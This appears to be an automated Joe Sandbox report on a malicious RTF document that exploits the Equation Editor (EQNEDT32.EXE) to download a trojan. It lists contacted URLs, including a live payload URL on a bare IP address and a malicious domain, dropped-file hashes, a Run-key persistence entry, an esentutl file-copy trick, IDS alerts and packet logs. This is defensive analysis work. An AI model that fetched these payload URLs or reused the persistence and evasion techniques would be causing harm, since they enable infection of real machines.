                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.398958656.0000000000756000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://sectigo.com/CPS0 | audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://crl.entrust.net/server1.crl0 | audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://ocsp.sectigo.com0 | audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://geoplugin.net/json.gp/C | audiodg.exe, 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://ocsp.entrust.net03 | audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://107.175.243.142/340/audiodg.exellC: | EQNEDT32.EXE, 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://www.diginotar.nl/cps/pkioverheid0 | audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.398958656.0000000000756000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://maan2u.com/doc/233_QzzgbhhaamlKd | audiodg.exe, 00000005.00000002.398958656.00000000006E5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://ocsp.entrust.net0D | audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://secure.comodo.com/CPS0 | audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://www.pmail.com | audiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402737811.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://crl.entrust.net/2048ca.crl0 | audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://ocsp.sectigo.com0C | audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    107.175.243.142 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
                    112.137.173.77 | maan2u.com | Malaysia | 17971 | TMVADS-APTM-VADSDCHostingMY | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1517947
                    Start date and time:2024-09-25 09:42:22 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:K0hpP6V2fo.rtf
                    renamed because original name is a hash value
                    Original Sample Name:7a9a05109dd848058fd327bc38459a3d.rtf
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winRTF@19/18@3/2
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 7
                    • Number of non-executed functions: 4
                    Cookbook Comments:
                    • Found application associated with file extension: .rtf
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active ActiveX Object
                    • Scroll down
                    • Close Viewer
                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 104.208.16.93
                    • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 3620 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: K0hpP6V2fo.rtf
                    Time | Type | Description
                    00:43:38 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qzzgbhha C:\Users\Public\Qzzgbhha.url
                    00:43:47 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qzzgbhha C:\Users\Public\Qzzgbhha.url
                    03:43:22 | API Interceptor | 315x Sleep call for process: EQNEDT32.EXE modified
                    03:43:27 | API Interceptor | 74x Sleep call for process: audiodg.exe modified
                    03:43:56 | API Interceptor | 7x Sleep call for process: Qzzgbhha.PIF modified
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1088512
                                        Entropy (8bit):6.864877848429584
                                        Encrypted:false
                                        SSDEEP:24576:ZUfEsM2Vlh4rSmqEhbhuJ2GH7JeUPUd6Yq7+gyQxy/Z:ZC4m/H7UU
                                        MD5:BBF710C83246092A538128620853D4FD
                                        SHA1:95338F06C76178DE31B5E8453F92C43F970EA9F9
                                        SHA-256:7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                                        SHA-512:A609D92FE0D25E7DB140C731AF4B241D47CDADDFE735D9F7575C982EF790AB01D7F969038546E6054101B745E8C208F74E41FAF246173CA0722C7B994CF94001
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 32%
                                        Joe Sandbox View:
                                        • Filename: XjPA2pnUhC.exe, Detection: malicious, Browse
                                        • Filename: Payment Slip.xls, Detection: malicious, Browse
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:CE338FE6899778AACFC28414F2D9498B
                                        SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                        SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                        SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                        Malicious:false
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):0.05390218305374581
                                        Encrypted:false
                                        SSDEEP:3:ol3lYdn:4Wn
                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                        Malicious:false
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):11264
                                        Entropy (8bit):3.528065202073949
                                        Encrypted:false
                                        SSDEEP:192:nWl9fM1ZlssgnYr0C8TopBqa7Vh3jZMOKhTFMzsSX3Aql3WkNByOgVOYVgkgpXiR:nWvUZyRnYr03ToSsr3KSnplmkNBAgRJu
                                        MD5:61B5AB2FBDF728C5F1A5BB23BFC2A371
                                        SHA1:7689D40EE8CD4C19977F6285DB8DD972263D6DED
                                        SHA-256:3DA845AAFDD0E282DFA5C094C28F037B289B463FF4A71F1FAF435772798D1D12
                                        SHA-512:1EC7AADC0C54B9614BBCAD9D1C68AEFEDCCB22D44652464F359222CD8D5C9A1C313FEA7781E51BB4474C4C249BDC445A8A2A6B4B9AA1F968760ED75434E2EB8E
                                        Malicious:false
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:12 2023, mtime=Fri Aug 11 15:42:12 2023, atime=Wed Sep 25 06:43:17 2024, length=104003, window=hide
                                        Category:dropped
                                        Size (bytes):1014
                                        Entropy (8bit):4.530872954267802
                                        Encrypted:false
                                        SSDEEP:12:8EbFgXg/XAlCPCHaXR3TBYB/Pr+X+Ws3cLGrN7icvb04RDtZ3YilMMEpxRljKlcM:8A/XTdmsWsLne5Dv3qf57u
                                        MD5:E0F3E26562E1B52FE07DB7F9F78D79B1
                                        SHA1:9B6500682DD2FE9720C49F8CDF3EF7373E5C4BD6
                                        SHA-256:5C2FEA784A2CC32EA708FD4BF1414D3864A54356459FC9F0F960C1E5AE169606
                                        SHA-512:E0AB11FE67453094F0DBEF2DA57DB6B5A9E330C15A9250A450FDB62D3F5E1D6F849F3E23BD4A89DDF90D365D4CB633485A227EFB4C86D239087647766C1802B8
                                        Malicious:false
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Generic INItialization configuration [folders]
                                        Category:dropped
                                        Size (bytes):55
                                        Entropy (8bit):4.553909258900532
                                        Encrypted:false
                                        SSDEEP:3:Hl7H86lm4cH86lv:Hl7lml1
                                        MD5:547A0658A453A3DD8667D25B07BBE22D
                                        SHA1:E3AF8DD091DE71FE66AB9D36281125CF2398DCE4
                                        SHA-256:B67F3C7600D5E0E6D0E51CDC1F2F35C924DE716334F273C53F40AE3AA6BA1CAA
                                        SHA-512:ED592194E8521DDFF58BF904D47E1D6D8232C432FF87C2CF2B32D6E572E168D90907866F5334F97EB280E2B61EF5EDA35DD734709528745A7C093D31E8177440
                                        Malicious:false
                                        Preview:[misc]..K0hpP6V2fo.LNK=0..[folders]..K0hpP6V2fo.LNK=0..
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1088512
                                        Entropy (8bit):6.864877848429584
                                        Encrypted:false
                                        SSDEEP:24576:ZUfEsM2Vlh4rSmqEhbhuJ2GH7JeUPUd6Yq7+gyQxy/Z:ZC4m/H7UU
                                        MD5:BBF710C83246092A538128620853D4FD
                                        SHA1:95338F06C76178DE31B5E8453F92C43F970EA9F9
                                        SHA-256:7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                                        SHA-512:A609D92FE0D25E7DB140C731AF4B241D47CDADDFE735D9F7575C982EF790AB01D7F969038546E6054101B745E8C208F74E41FAF246173CA0722C7B994CF94001
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 32%
                                        Joe Sandbox View:
                                        • Filename: XjPA2pnUhC.exe, Detection: malicious, Browse
                                        • Filename: Payment Slip.xls, Detection: malicious, Browse
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Roaming\audiodg.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):2.0
                                        Encrypted:false
                                        SSDEEP:3:Jn:Jn
                                        MD5:17A1D5E252F7DEA2B5162C7E8CE55239
                                        SHA1:0796EB344F59291ECB828FB4307BF831314A72DC
                                        SHA-256:8C094FA7A36D960F46EB971614F084207C9A037D28C4B42B622F887EFE455D99
                                        SHA-512:2DE9E6087141362BF25773C77FADB788B5A88A8FB55373848C044C6DE62ACEC8905588610A1CDACB746A4AD3F93B4415A09B05A868650B13CE8114F2AE1CFC8E
                                        Malicious:false
                                        Preview:47..
                                        Process:C:\Users\user\AppData\Roaming\audiodg.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):838459
                                        Entropy (8bit):7.206470842924749
                                        Encrypted:false
                                        SSDEEP:12288:cd6lycsEh2/Qd72Q9q7UKotuTJ/4hppo5lc06HxNnrpEGOFz9cWVAfGWYHW8:k6lycs4Nd7Azo41uppOOhIFBe+Z
                                        MD5:E9303B0472758478C2F6287D39F73614
                                        SHA1:FAD32F4636A60969F0C9C3B1CA8D1A0AB5C9D37D
                                        SHA-256:4224050F7B373F1F8D35D736741DCE705F12058F2BCDDA8FAB9D95969D3722FF
                                        SHA-512:3237492F2A486E0E2CCE18DBAAA16798039C967C34AB60162A37F010E96588EFF58549361AACD08FB80FF13DC8DF8212AA45C89A012B69349F23CF5CC0CBD5FD
                                        Malicious:true
                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1088512
                                        Entropy (8bit):6.864877848429584
                                        Encrypted:false
                                        SSDEEP:24576:ZUfEsM2Vlh4rSmqEhbhuJ2GH7JeUPUd6Yq7+gyQxy/Z:ZC4m/H7UU
                                        MD5:BBF710C83246092A538128620853D4FD
                                        SHA1:95338F06C76178DE31B5E8453F92C43F970EA9F9
                                        SHA-256:7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                                        SHA-512:A609D92FE0D25E7DB140C731AF4B241D47CDADDFE735D9F7575C982EF790AB01D7F969038546E6054101B745E8C208F74E41FAF246173CA0722C7B994CF94001
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 32%
                                        Joe Sandbox View:
                                        • Filename: XjPA2pnUhC.exe, Detection: malicious, Browse
                                        • Filename: Payment Slip.xls, Detection: malicious, Browse
                                        Process:C:\Users\user\AppData\Roaming\audiodg.exe
                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):62357
                                        Entropy (8bit):4.705712327109906
                                        Encrypted:false
                                        SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                        MD5:B87F096CBC25570329E2BB59FEE57580
                                        SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                        SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                        SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Roaming\audiodg.exe
                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF">), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):104
                                        Entropy (8bit):5.186977310292462
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMskWTsbxc1RPu:HRYFVmTWDyzZkWTExc1RPu
                                        MD5:C03CC70E37479190C34873448F1342AA
                                        SHA1:1CF34EC1DEA5FE2674FEDB961B99BB8840C6D190
                                        SHA-256:95949DC04D34E61CF21853C30F925DABB10AC3F5723EA71A576A864087F2A569
                                        SHA-512:7F1E76F3981B1D16A677788BFDEA7FA09B6B960FD6F30296F0CA1DE15955AE390A9C9CAC1F3B5345B47F4AEA70D084A1F10B71B7BEE45254DFAA980783CE407F
                                        Malicious:true
                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF"..IconIndex=925978..HotKey=33..
                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):302592
                                        Entropy (8bit):4.593928239196407
                                        Encrypted:false
                                        SSDEEP:3072:H/Fkbff/FoeMrx9O1vfjQdLCQMcP7FRCMkLjyGez1c:H9kbtoLtM1nM9xf/CMkLmt+
                                        MD5:AD7B9C14083B52BC532FBA5948342B98
                                        SHA1:EE8CBF12D87C4D388F09B4F69BED2E91682920B5
                                        SHA-256:17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
                                        SHA-512:E12AAD20C824187B39EDB3C7943709290B5DDBF1B4032988DB46F2E86DA3CF7E7783F78C82E4DC5DA232F666B8F9799A260A1F8E2694EB4D0CDAF78DA710FDE1
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):15360
                                        Entropy (8bit):5.721538416093858
                                        Encrypted:false
                                        SSDEEP:384:lOi8W9+0F7A3fNpl+rKOFvK/WDHlWyzo:slWE0F7gle1j
                                        MD5:6242E3D67787CCBF4E06AD2982853144
                                        SHA1:6AC7947207D999A65890AB25FE344955DA35028E
                                        SHA-256:4CA10DBA7FF487FDB3F1362A3681D7D929F5AA1262CDFD31B04C30826983FB1D
                                        SHA-512:7D0D457E1537D624119A8023BCC086575696A5739C0460EF11554AFAC13AF5E5D1EDC7629A10E62834ABA9F1B3AB1442011B15B4C3930399D91DCA34B3B1CBAF
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)wO.m.!.m.!.m.!.dn..l.!.dn..l.!.dn..|.!.m. .$.!.dn..{.!.dn..l.!.dn..l.!.Richm.!.........................PE..L...d.[J.................(...&.......*.......@.......................................{....@...... ...........................0.......`.......................p.. ...0...................................@............................................text...r&.......(.................. ..`.data........@.......,..............@....rsrc........`......................@..@.reloc.......p.......8..............@..B~.[J@.....[JM...o.[JZ.....[Je.../.[Jr.....[J}...J.[J............ADVAPI32.dll.KERNEL32.dll.msvcrt.dll.IPHLPAPI.DLL.USER32.dll.ntdll.dll.WS2_32.dll.......................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):440
                                        Entropy (8bit):4.414834612341623
                                        Encrypted:false
                                        SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjC9B8NGNT:/p4xT5cp7u0wQz8Ng
                                        MD5:D6FD95E16E65742E3C5F7A76904B7D9D
                                        SHA1:9D32DADB0FCCE263CCEA52FFD09BDB70EC003DAF
                                        SHA-256:F7220592C15EA8CEFD38D3DA882A03DB13CF379FD1445AB31FD8B7E8C8C03DDF
                                        SHA-512:46E06D94DFA907434D0A27A1EAE80C4ED530966198F45C1CBF11B4656B7C6E94F65D9C5E285487D32824829DDA46A369435EC8421CCE20F5F7A12B02ACBB85E0
                                        Malicious:false
                                        Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Operation completed successfully in 0.281 seconds.....
                                        File type:Rich Text Format data, version 1
                                        Entropy (8bit):2.6616842302746084
                                        TrID:
                                        • Rich Text Format (5005/1) 55.56%
                                        • Rich Text Format (4004/1) 44.44%
                                        File name:K0hpP6V2fo.rtf
                                        File size:104'003 bytes
                                        MD5:7a9a05109dd848058fd327bc38459a3d
                                        SHA1:a086488bd204ca42e9d522b769b94c9467ad5520
                                        SHA256:9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2
                                        SHA512:8dde56f67785f7594f1e4fe2a3b05519333daa980bae0fd84ffa34671d1d1f7507af6d04dba4909d3195db536ae2fd2782a6f45f5eb7f0df5015ca4b88e0925d
                                        SSDEEP:768:mbTYjIXuCGvGvJSuv0AwTaTSvq1e397u1X:mojyValnaev+eNK
                                        TLSH:9AA3CD99D78F41A4CF55A67B030A4E8806FCB33EB60141B678AC977037ADC3E49658BD
                                        File Content Preview:{\rtf1..{\*\j60dMM2PnzW8KVuI5mk454GdOVAcaekyRUDuvTF9MwrWrmRf7K61GSFB81RNfQN9eeNXhDnANiytiODXr2Fp68em2Fm7zgq7mLAXaspxH6UHlcPShfqXWMcvXzstUhHNCMEwUkV5Tt4iwj8x31YAORI911Nj4krVKUEoJ6z3MqND81aZKr1kddqzu6ufc7izbUp8yDPPKl4pFmupvzuKAFRza2Ai252ONAgyMNxgoQnZDHFFGAs
                                        Icon Hash:2764a3aaaeb7bdbf
                                        Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                        0 | 000014F1h |  |  |  |  |  |  |  | no
                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                        2024-09-25T09:43:26.396591+0200 | 2022050 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 | 1 | 107.175.243.142 | 80 | 192.168.2.22 | 49163 | TCP
                                        2024-09-25T09:43:26.488041+0200 | 2022051 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 | 1 | 107.175.243.142 | 80 | 192.168.2.22 | 49163 | TCP
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Sep 25, 2024 09:43:26.667874098 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.667896986 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.667906046 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.668324947 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668375969 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.668386936 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668390036 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668421984 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.668500900 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668513060 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668524027 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668534994 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668545961 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.668556929 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.668570042 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.668649912 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668661118 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668672085 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668682098 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668703079 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.668759108 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.668845892 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668886900 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.668987036 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.668998957 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.669009924 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.669029951 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.669049025 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.751202106 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.751238108 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.751249075 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.751260996 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.751260996 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.751321077 CEST4916380192.168.2.22107.175.243.142
